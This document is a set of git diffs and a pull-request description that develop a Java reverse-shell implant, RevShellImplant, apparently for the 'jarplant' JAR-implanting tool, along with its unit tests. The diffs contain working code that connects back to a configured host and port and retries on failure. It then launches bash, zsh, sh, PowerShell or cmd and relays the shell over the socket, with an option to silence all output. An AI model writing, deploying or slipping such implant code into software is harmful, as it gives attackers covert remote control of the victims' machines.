 import java.nio.file.FileSystem;
 import java.nio.file.FileSystems;
@@ -30,6 +31,8 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
      * TCP port number to use when connecting back.
      */
     static volatile int CONF_LPORT = 12345;
+
+    static volatile int CONF_TIMEOUT_SECONDS = 10;
 
     /**
      * Amount of seconds to wait between connection attempts.
@@ -85,10 +88,11 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
 
         while (!Thread.interrupted()) {
             log("[$] Connecting to " + CONF_LHOST + ":" + CONF_LPORT + "...");
-            try (Socket connection = new Socket(CONF_LHOST, CONF_LPORT);
+            try (Socket connection = new Socket()) {
+                connection.setKeepAlive(true);
+                connection.connect(new InetSocketAddress(CONF_LHOST, CONF_LPORT), CONF_TIMEOUT_SECONDS);
                 InputStream fromRemote = connection.getInputStream();
                 OutputStream toRemote = connection.getOutputStream();
-            ) {
                 log("[+] Connected to " + CONF_LHOST + ":" + CONF_LPORT + "!");
 
                 String shellCommandExecStr = shellCommand.get().toAbsolutePath().toString();

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -361,9 +361,4 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
             System.out.println(msg);
         }
     }
-
-    public static void main(String[] args) {
-        RevShellImplant implant = new RevShellImplant();
-        implant.payload();
-    }
 }

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -1,6 +1,6 @@
 package io.github.w1th4d.jarplant.implants;
 
-import java.io.Closeable;
+import java.io.File;
 import java.io.IOException;
 import java.io.InputStream;
 import java.io.OutputStream;
@@ -11,7 +11,6 @@ import java.nio.file.Files;
 import java.nio.file.Path;
 import java.time.Duration;
 import java.util.Arrays;
-import java.util.LinkedList;
 import java.util.List;
 import java.util.Optional;
 
@@ -102,9 +101,19 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 OutputStream toShell = shell.getOutputStream();
                 log("[$] Shell '" + shellCommandExecStr + "' popped with PID " + shell.pid() + ".");
 
-                log("[ ] Transferring data between shell and socket...");
-                handleCommunications(fromShell, toShell, fromRemote, toRemote, connection);
+                Thread pipe1 = new Thread(() -> {
+                    transfer(fromShell, toRemote);
+                });
+                pipe1.start();
 
+                Thread pipe2 = new Thread(() -> {
+                    transfer(fromRemote, toShell);
+                });
+                pipe2.start();
+
+                log("[ ] Waiting...");
+                pipe1.join();
+                pipe2.join();
                 log("[ ] Terminated.");
             } catch (IOException e) {
                 log("[!] " + e.getClass().getName() + ": " + e.getMessage());
@@ -123,32 +132,6 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         }
     }
 
-    // Separate method for testability.
-    static void handleCommunications(InputStream fromShell, OutputStream toShell, InputStream fromRemote, OutputStream toRemote, Socket socket) throws InterruptedException {
-        List<Thread> threads = new LinkedList<>();
-
-        Thread pipe1 = new Thread(() -> {
-            transfer(fromShell, toRemote, threads);
-            closeAll(fromShell, toShell, fromRemote, toRemote, socket);
-        });
-
-        Thread pipe2 = new Thread(() -> {
-            transfer(fromRemote, toShell, threads);
-            closeAll(fromShell, toShell, fromRemote, toRemote, socket);
-        });
-
-        threads.add(pipe1);
-        threads.add(pipe2);
-
-        pipe1.start();
-        pipe2.start();
-
-        pipe1.join();
-        System.out.println("shell -> socket: done");
-        pipe2.join();
-        System.out.println("socket -> shell: done");
-    }
-
     /**
      * Transfer all data from one stream to another.
      * No string/text interpretation will be done. Just raw bytes.
@@ -157,9 +140,7 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
      * @param input  from
      * @param output to
      */
-    private static void transfer(InputStream input, OutputStream output, List<Thread> threads) {
-        System.out.println("transfer started");
-
+    private static void transfer(InputStream input, OutputStream output) {
         byte[] buffer = new byte[256];
         while (!Thread.interrupted()) {
             try {
@@ -174,17 +155,10 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
             }
         }
 
-        for (Thread thread : threads) {
-            thread.interrupt();
-        }
-    }
-
-    private static void closeAll(Closeable... closeables) {
-        for (Closeable closeable : closeables) {
-            try {
-                closeable.close();
-            } catch (IOException ignored) {
-            }
+        try {
+            input.close();
+            output.close();
+        } catch (IOException ignored) {
         }
     }
 

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -1,6 +1,6 @@
 package io.github.w1th4d.jarplant.implants;
 
-import java.io.File;
+import java.io.Closeable;
 import java.io.IOException;
 import java.io.InputStream;
 import java.io.OutputStream;
@@ -103,11 +103,13 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
 
                 Thread pipe1 = new Thread(() -> {
                     transfer(fromShell, toRemote);
+                    closeAll(fromShell, toShell, fromRemote, toRemote, connection);
                 });
                 pipe1.start();
 
                 Thread pipe2 = new Thread(() -> {
                     transfer(fromRemote, toShell);
+                    closeAll(fromShell, toShell, fromRemote, toRemote, connection);
                 });
                 pipe2.start();
 
@@ -154,11 +156,14 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 break;
             }
         }
+    }
 
-        try {
-            input.close();
-            output.close();
-        } catch (IOException ignored) {
+    private static void closeAll(Closeable... closeables) {
+        for (Closeable closeable : closeables) {
+            try {
+                closeable.close();
+            } catch (IOException ignored) {
+            }
         }
     }
 

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -1,10 +1,16 @@
 package io.github.w1th4d.jarplant.implants;
 
+import java.io.File;
 import java.io.IOException;
 import java.io.InputStream;
 import java.io.OutputStream;
 import java.net.Socket;
+import java.nio.file.Files;
+import java.nio.file.Path;
 import java.time.Duration;
+import java.util.Arrays;
+import java.util.List;
+import java.util.Optional;
 
 public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandler {
     // Standard config fields from ClassImplant template:
@@ -63,6 +69,12 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
             return;
         }
 
+        Optional<Path> shellCommand = findShellExecutable();
+        if (shellCommand.isEmpty()) {
+            System.out.println("[!] Cannot find shell executable!");
+            return;
+        }
+
         while (!Thread.interrupted()) {
             System.out.println("[$] Connecting to " + CONF_LHOST + ":" + CONF_LPORT + "...");
             try (Socket connection = new Socket(CONF_LHOST, CONF_LPORT)) {
@@ -71,7 +83,7 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 System.out.println("[+] Connected to " + CONF_LHOST + ":" + CONF_LPORT + "!");
 
                 Process shell = new ProcessBuilder()
-                        .command("/bin/bash")
+                        .command(shellCommand.get().toAbsolutePath().toString())
                         .redirectErrorStream(true)
                         .start();
                 InputStream fromShell = shell.getInputStream();
@@ -136,6 +148,77 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
             input.close();
             output.close();
         } catch (IOException ignored) {
+        }
+    }
+
+    /**
+     * Find the most preferred shell.
+     *
+     * @return maybe a path to an executable file
+     */
+    private static Optional<Path> findShellExecutable() {
+        String osName = System.getProperty("os.name").toLowerCase();
+        if (osName.startsWith("windows")) {
+            String pathEnv = System.getenv("PATH");
+            return findWindowsShellExecutable(pathEnv);
+        } else if (osName.startsWith("linux")) {
+            return findUnixShellExecutable();
+        } else if (osName.startsWith("mac")) {
+            return findUnixShellExecutable();
+        } else {
+            return Optional.empty();
+        }
+    }
+
+    static Optional<Path> findUnixShellExecutable() {
+        List<Path> candidates = Arrays.asList(
+                Path.of("/bin/bash"),
+                Path.of("/bin/zsh"),
+                Path.of("/bin/sh")
+        );
+        for (Path candidate : candidates) {
+            if (Files.exists(candidate) && Files.isExecutable(candidate)) {
+                return Optional.of(candidate);
+            }
+        }
+
+        return Optional.empty();
+    }
+
+    static Optional<Path> findWindowsShellExecutable(String pathEnv) {
+        if (pathEnv == null || pathEnv.isEmpty()) {
+            return Optional.empty();
+        }
+
+        Optional<Path> powershell = Optional.empty();
+        Optional<Path> cmd = Optional.empty();
+
+        String[] binPaths = pathEnv.split(File.pathSeparator);
+        for (String binPath : binPaths) {
+            Path path = Path.of(binPath);
+            if (Files.exists(path) && Files.isDirectory(path)) {
+                if (powershell.isEmpty()) {
+                    Path candidate = path.resolve("powershell.exe");
+                    if (Files.exists(candidate) && Files.isExecutable(candidate)) {
+                        powershell = Optional.of(candidate);
+                    }
+                }
+
+                if (cmd.isEmpty()) {
+                    Path candidate = path.resolve("cmd.exe");
+                    if (Files.exists(candidate) && Files.isExecutable(candidate)) {
+                        cmd = Optional.of(candidate);
+                    }
+                }
+            }
+        }
+
+        if (powershell.isPresent()) {
+            return powershell;
+        } else if (cmd.isPresent()) {
+            return cmd;
+        } else {
+            return Optional.empty();
         }
     }
 

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -106,13 +106,15 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
 
                 Thread pipe1 = new Thread(() -> {
                     transfer(fromShell, toRemote);
-                    closeAll(fromShell, toShell, fromRemote, toRemote, connection);
+                    closeAll(connection);
+                    shell.destroy();
                 });
                 pipe1.start();
 
                 Thread pipe2 = new Thread(() -> {
                     transfer(fromRemote, toShell);
-                    closeAll(fromShell, toShell, fromRemote, toRemote, connection);
+                    closeAll(connection);
+                    shell.destroy();
                 });
                 pipe2.start();
 

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -34,6 +34,12 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
      */
     static volatile int CONF_RETRY_WAIT_SECONDS = 30;
 
+    /**
+     * Print debug output to stdout.
+     * Setting this to false will make the implant completely quiet.
+     */
+    static volatile boolean CONF_DEBUG_OUTPUT = true;
+
     @SuppressWarnings("unused")
     public static void init() {
         if (System.getProperty(CONF_JVM_MARKER_PROP) == null) {
@@ -71,24 +77,25 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
 
         Optional<Path> shellCommand = findShellExecutable();
         if (shellCommand.isEmpty()) {
-            System.out.println("[!] Cannot find shell executable!");
+            log("[!] Cannot find shell executable!");
             return;
         }
 
         while (!Thread.interrupted()) {
-            System.out.println("[$] Connecting to " + CONF_LHOST + ":" + CONF_LPORT + "...");
+            log("[$] Connecting to " + CONF_LHOST + ":" + CONF_LPORT + "...");
             try (Socket connection = new Socket(CONF_LHOST, CONF_LPORT)) {
                 InputStream fromRemote = connection.getInputStream();
                 OutputStream toRemote = connection.getOutputStream();
-                System.out.println("[+] Connected to " + CONF_LHOST + ":" + CONF_LPORT + "!");
+                log("[+] Connected to " + CONF_LHOST + ":" + CONF_LPORT + "!");
 
+                String shellCommandExecStr = shellCommand.get().toAbsolutePath().toString();
                 Process shell = new ProcessBuilder()
-                        .command(shellCommand.get().toAbsolutePath().toString())
+                        .command(shellCommandExecStr)
                         .redirectErrorStream(true)
                         .start();
                 InputStream fromShell = shell.getInputStream();
                 OutputStream toShell = shell.getOutputStream();
-                System.out.println("[$] Shell popped with PID " + shell.pid() + ".");
+                log("[$] Shell '" + shellCommandExecStr + "' popped with PID " + shell.pid() + ".");
 
                 Thread pipe1 = new Thread(() -> {
                     transfer(fromShell, toRemote);
@@ -100,14 +107,14 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 });
                 pipe2.start();
 
-                System.out.println("[ ] Waiting...");
+                log("[ ] Waiting...");
                 pipe1.join();
                 pipe2.join();
 
                 shell.destroy();
-                System.out.println("[ ] Terminated.");
+                log("[ ] Terminated.");
             } catch (IOException e) {
-                System.out.println("[!] " + e.getClass().getName() + ": " + e.getMessage());
+                log("[!] " + e.getClass().getName() + ": " + e.getMessage());
                 try {
                     Thread.sleep(Duration.ofSeconds(CONF_RETRY_WAIT_SECONDS).toMillis());
                 } catch (InterruptedException ignored) {
@@ -137,8 +144,6 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 }
                 output.write(buffer, 0, readAmount);
                 output.flush();
-                System.out.print(".");
-                System.out.flush();
             } catch (IOException e) {
                 break;
             }
@@ -219,6 +224,12 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
             return cmd;
         } else {
             return Optional.empty();
+        }
+    }
+
+    private static void log(String msg) {
+        if (CONF_DEBUG_OUTPUT) {
+            System.out.println(msg);
         }
     }
 

--- a/jarplant-implants/src/test/java/io/github/w1th4d/jarplant/implants/RevShellImplantTests.java
+++ b/jarplant-implants/src/test/java/io/github/w1th4d/jarplant/implants/RevShellImplantTests.java
@@ -1,0 +1,133 @@
+package io.github.w1th4d.jarplant.implants;
+
+import com.google.common.jimfs.Configuration;
+import com.google.common.jimfs.Jimfs;
+import org.junit.Assert;
+import org.junit.Test;
+
+import java.io.IOException;
+import java.nio.file.FileSystem;
+import java.nio.file.Files;
+import java.nio.file.Path;
+import java.util.Optional;
+
+public class RevShellImplantTests {
+    @Test
+    public void testFindUnixShellExecutable_RichLinuxSystem_FoundBash() throws IOException {
+        // Arrange
+        FileSystem jimfs = Jimfs.newFileSystem(Configuration.unix());
+
+        Path shPath = jimfs.getPath("/bin/sh");
+        Files.createDirectories(shPath.getParent());
+        Files.createFile(shPath);
+
+        Path bashPath = jimfs.getPath("/bin/bash");
+        Files.createDirectories(bashPath.getParent());
+        Files.createFile(bashPath);
+
+        // Act
+        Optional<Path> bashExecutable = RevShellImplant.findUnixShellExecutable(jimfs);
+
+        // Assert
+        Assert.assertTrue(bashExecutable.isPresent());
+        Assert.assertEquals(
+                "/bin/bash",
+                bashExecutable.get().toString()
+        );
+    }
+
+    @Test
+    public void testFindUnixShellExecutable_MinimalLinuxSystem_FoundSh() throws IOException {
+        // Arrange
+        FileSystem jimfs = Jimfs.newFileSystem(Configuration.unix());
+
+        Path shPath = jimfs.getPath("/bin/sh");
+        Files.createDirectories(shPath.getParent());
+        Files.createFile(shPath);
+
+        // Act
+        Optional<Path> bashExecutable = RevShellImplant.findUnixShellExecutable(jimfs);
+
+        // Assert
+        Assert.assertTrue(bashExecutable.isPresent());
+        Assert.assertEquals(
+                "/bin/sh",
+                bashExecutable.get().toString()
+        );
+    }
+
+    @Test
+    public void testFindUnixShellExecutable_TypicalMacOsSystem_FoundBash() throws IOException {
+        // Arrange
+        FileSystem jimfs = Jimfs.newFileSystem(Configuration.osX());
+
+        // All three exist on a typical macOS installation.
+        Path bashPath = jimfs.getPath("/bin/bash");
+        Files.createDirectories(bashPath.getParent());
+        Files.createFile(bashPath);
+
+        Path zshPath = jimfs.getPath("/bin/zsh");
+        Files.createDirectories(zshPath.getParent());
+        Files.createFile(zshPath);
+
+        Path shPath = jimfs.getPath("/bin/sh");
+        Files.createDirectories(shPath.getParent());
+        Files.createFile(shPath);
+
+        // Act
+        Optional<Path> bashExecutable = RevShellImplant.findUnixShellExecutable(jimfs);
+
+        // Assert
+        Assert.assertTrue(bashExecutable.isPresent());
+        Assert.assertEquals(
+                // Even as zsh is the default shell for macOS, expect bash to be found first.
+                "/bin/bash",
+                bashExecutable.get().toString()
+        );
+    }
+
+    @Test
+    public void testFindWindowsShellExecutable_TypicalWin11System_FoundPowershell() throws IOException {
+        // Arrange
+        FileSystem jimfs = Jimfs.newFileSystem(Configuration.windows());
+        String pathEnvVar = "C:\\Program Files\\Common Files\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\OpenSSH\\;C:\\Program Files\\Microsoft SQL Server\\150\\Tools\\Binn\\;C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\;C:\\Program Files\\dotnet\\;C:\\Program Files\\Git\\cmd;C:\\Users\\User\\AppData\\Local\\Microsoft\\WindowsApps;C:\\Users\\User\\.dotnet\\tools"
+                .replace("\\", "/");    // Because Jimfs does not support Windows-style path separators.
+        for (String path : pathEnvVar.split(";")) {
+            Files.createDirectories(jimfs.getPath(path));
+        }
+        Files.createFile(jimfs.getPath("C:/Windows/system32/cmd.exe"));
+        Files.createFile(jimfs.getPath("C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe"));
+
+        // Act
+        Optional<Path> shellExecutable = RevShellImplant.findWindowsShellExecutable(jimfs, pathEnvVar);
+
+        // Assert
+        Assert.assertTrue(shellExecutable.isPresent());
+        Assert.assertEquals(
+                "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
+                shellExecutable.get().toString()
+        );
+    }
+
+    @Test
+    public void testFindWindowsShellExecutable_NoPowerShellWindows_FoundCmdFallback() throws IOException {
+        // Arrange
+        FileSystem jimfs = Jimfs.newFileSystem(Configuration.windows());
+        String pathEnvVar = "C:\\Program Files\\Common Files\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\OpenSSH\\;C:\\Program Files\\Microsoft SQL Server\\150\\Tools\\Binn\\;C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\;C:\\Program Files\\dotnet\\;C:\\Program Files\\Git\\cmd;C:\\Users\\User\\AppData\\Local\\Microsoft\\WindowsApps;C:\\Users\\User\\.dotnet\\tools"
+                .replace("\\", "/");    // Because Jimfs does not support Windows-style path separators.
+        for (String path : pathEnvVar.split(";")) {
+            Files.createDirectories(jimfs.getPath(path));
+        }
+        Files.createFile(jimfs.getPath("C:/Windows/system32/cmd.exe"));
+
+        // Act
+        Optional<Path> shellExecutable = RevShellImplant.findWindowsShellExecutable(jimfs, pathEnvVar);
+
+        // Assert
+        Assert.assertTrue(shellExecutable.isPresent());
+        Assert.assertEquals(
+                "C:\\Windows\\system32\\cmd.exe",
+                shellExecutable.get().toString()
+        );
+    }
+}

--- a/jarplant-implants/src/test/java/io/github/w1th4d/jarplant/implants/RevShellImplantTests.java
+++ b/jarplant-implants/src/test/java/io/github/w1th4d/jarplant/implants/RevShellImplantTests.java
@@ -6,12 +6,65 @@ import org.junit.Assert;
 import org.junit.Test;
 
 import java.io.IOException;
+import java.io.PipedInputStream;
+import java.io.PipedOutputStream;
+import java.net.Socket;
+import java.nio.charset.StandardCharsets;
 import java.nio.file.FileSystem;
 import java.nio.file.Files;
 import java.nio.file.Path;
+import java.time.Duration;
 import java.util.Optional;
 
 public class RevShellImplantTests {
+    @Test
+    public void testHandleCommunications_HappyCase_Fine() throws IOException, InterruptedException {
+        // Arrange
+        PipedOutputStream sendFromFakeShell = new PipedOutputStream();
+        PipedInputStream recvFromFakeShell = new PipedInputStream();
+        PipedOutputStream sendFromFakeSocket = new PipedOutputStream();
+        PipedInputStream recvFromFakeSocket = new PipedInputStream();
+
+        PipedInputStream fromShell = new PipedInputStream(sendFromFakeShell);
+        PipedOutputStream toShell = new PipedOutputStream(recvFromFakeShell);
+        PipedInputStream fromSocket = new PipedInputStream(sendFromFakeSocket);
+        PipedOutputStream toSocket = new PipedOutputStream(recvFromFakeSocket);
+
+        Socket dummySocket = new Socket();
+
+        // Act
+        Thread comms = new Thread(() -> {
+            try {
+                RevShellImplant.handleCommunications(fromShell, toShell, fromSocket, toSocket, dummySocket); // Blocking call.
+            } catch (InterruptedException e) {
+                throw new RuntimeException(e);
+            }
+        });
+        comms.start();
+
+        // Assert
+        // Simulate shell outputting something.
+        byte[] shellGreeting = "This is FakeShell!\n".getBytes(StandardCharsets.UTF_8);
+        sendFromFakeShell.write(shellGreeting);
+        Assert.assertArrayEquals(shellGreeting, recvFromFakeSocket.readNBytes(shellGreeting.length));
+
+        // Simulate socket sending a command.
+        byte[] command = "whoami\n".getBytes(StandardCharsets.UTF_8);
+        sendFromFakeSocket.write(command);
+        Assert.assertArrayEquals(command, recvFromFakeShell.readNBytes(command.length));
+
+        // Simulate receiving the result of the command.
+        byte[] commandRet = "root\n".getBytes(StandardCharsets.UTF_8);
+        sendFromFakeShell.write(commandRet);
+        Assert.assertArrayEquals(commandRet, recvFromFakeSocket.readNBytes(commandRet.length));
+
+        // Simulate disconnection.
+        sendFromFakeSocket.close();
+        recvFromFakeSocket.close();
+        comms.join(Duration.ofSeconds(10).toMillis());   // Should return fast, but don't wait for too long.
+        Assert.assertFalse(comms.isAlive());
+    }
+
     @Test
     public void testFindUnixShellExecutable_RichLinuxSystem_FoundBash() throws IOException {
         // Arrange

--- a/jarplant-implants/src/test/java/io/github/w1th4d/jarplant/implants/RevShellImplantTests.java
+++ b/jarplant-implants/src/test/java/io/github/w1th4d/jarplant/implants/RevShellImplantTests.java
@@ -6,65 +6,12 @@ import org.junit.Assert;
 import org.junit.Test;
 
 import java.io.IOException;
-import java.io.PipedInputStream;
-import java.io.PipedOutputStream;
-import java.net.Socket;
-import java.nio.charset.StandardCharsets;
 import java.nio.file.FileSystem;
 import java.nio.file.Files;
 import java.nio.file.Path;
-import java.time.Duration;
 import java.util.Optional;
 
 public class RevShellImplantTests {
-    @Test
-    public void testHandleCommunications_HappyCase_Fine() throws IOException, InterruptedException {
-        // Arrange
-        PipedOutputStream sendFromFakeShell = new PipedOutputStream();
-        PipedInputStream recvFromFakeShell = new PipedInputStream();
-        PipedOutputStream sendFromFakeSocket = new PipedOutputStream();
-        PipedInputStream recvFromFakeSocket = new PipedInputStream();
-
-        PipedInputStream fromShell = new PipedInputStream(sendFromFakeShell);
-        PipedOutputStream toShell = new PipedOutputStream(recvFromFakeShell);
-        PipedInputStream fromSocket = new PipedInputStream(sendFromFakeSocket);
-        PipedOutputStream toSocket = new PipedOutputStream(recvFromFakeSocket);
-
-        Socket dummySocket = new Socket();
-
-        // Act
-        Thread comms = new Thread(() -> {
-            try {
-                RevShellImplant.handleCommunications(fromShell, toShell, fromSocket, toSocket, dummySocket); // Blocking call.
-            } catch (InterruptedException e) {
-                throw new RuntimeException(e);
-            }
-        });
-        comms.start();
-
-        // Assert
-        // Simulate shell outputting something.
-        byte[] shellGreeting = "This is FakeShell!\n".getBytes(StandardCharsets.UTF_8);
-        sendFromFakeShell.write(shellGreeting);
-        Assert.assertArrayEquals(shellGreeting, recvFromFakeSocket.readNBytes(shellGreeting.length));
-
-        // Simulate socket sending a command.
-        byte[] command = "whoami\n".getBytes(StandardCharsets.UTF_8);
-        sendFromFakeSocket.write(command);
-        Assert.assertArrayEquals(command, recvFromFakeShell.readNBytes(command.length));
-
-        // Simulate receiving the result of the command.
-        byte[] commandRet = "root\n".getBytes(StandardCharsets.UTF_8);
-        sendFromFakeShell.write(commandRet);
-        Assert.assertArrayEquals(commandRet, recvFromFakeSocket.readNBytes(commandRet.length));
-
-        // Simulate disconnection.
-        sendFromFakeSocket.close();
-        recvFromFakeSocket.close();
-        comms.join(Duration.ofSeconds(10).toMillis());   // Should return fast, but don't wait for too long.
-        Assert.assertFalse(comms.isAlive());
-    }
-
     @Test
     public void testFindUnixShellExecutable_RichLinuxSystem_FoundBash() throws IOException {
         // Arrange


### PR DESCRIPTION
Classic reverse shell that connects to a specified hostname, IPv4 or IPv6 address and TCP port.

Unfortunately, this is an unstable shell. Meaning it does not support PTY terminal emulation. Doing so turns out to be suprizingly complicated in Java (effectively requiring libraries that uses JNI/JNA which is a huge footprint for an implant).

Tested on Linux v6.8.0, Windows 11 22H2 and macOS v15.4.